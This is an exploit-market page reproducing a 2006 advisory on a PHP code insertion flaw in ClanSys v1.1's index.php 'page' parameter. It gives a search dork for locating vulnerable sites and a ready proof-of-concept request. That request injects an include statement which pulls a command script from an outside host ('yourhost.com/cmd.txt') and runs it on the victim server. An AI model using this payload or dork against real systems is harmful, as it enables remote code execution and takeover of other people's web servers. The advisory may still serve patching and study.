[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Clansys <= v.1.1 (index.php page) PHP Code Insertion Vulnerability

Author
nukedx
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-377
Category
web applications
Date add
22-04-2006
Platform
unsorted
==================================================================
Clansys <= v.1.1 (index.php page) PHP Code Insertion Vulnerability
==================================================================





NukedX Security Advisory Nr 2006-29
ClanSys v1.1 (index.php page) PHP Code Insertion Vulnerability
Dork: "ClanSys v.1.1" 2.400 pages.
Full PoC ->
GET -> http://[victim]/[ClanSysPath]/index.php?page=[PHPCode]
EXAMPLE -> http://[victim]/[ClanSysPath]/index.php?page=<?include($s);?>&s=http://yourhost.com/cmd.txt?



#  0day.today [2024-07-07]  #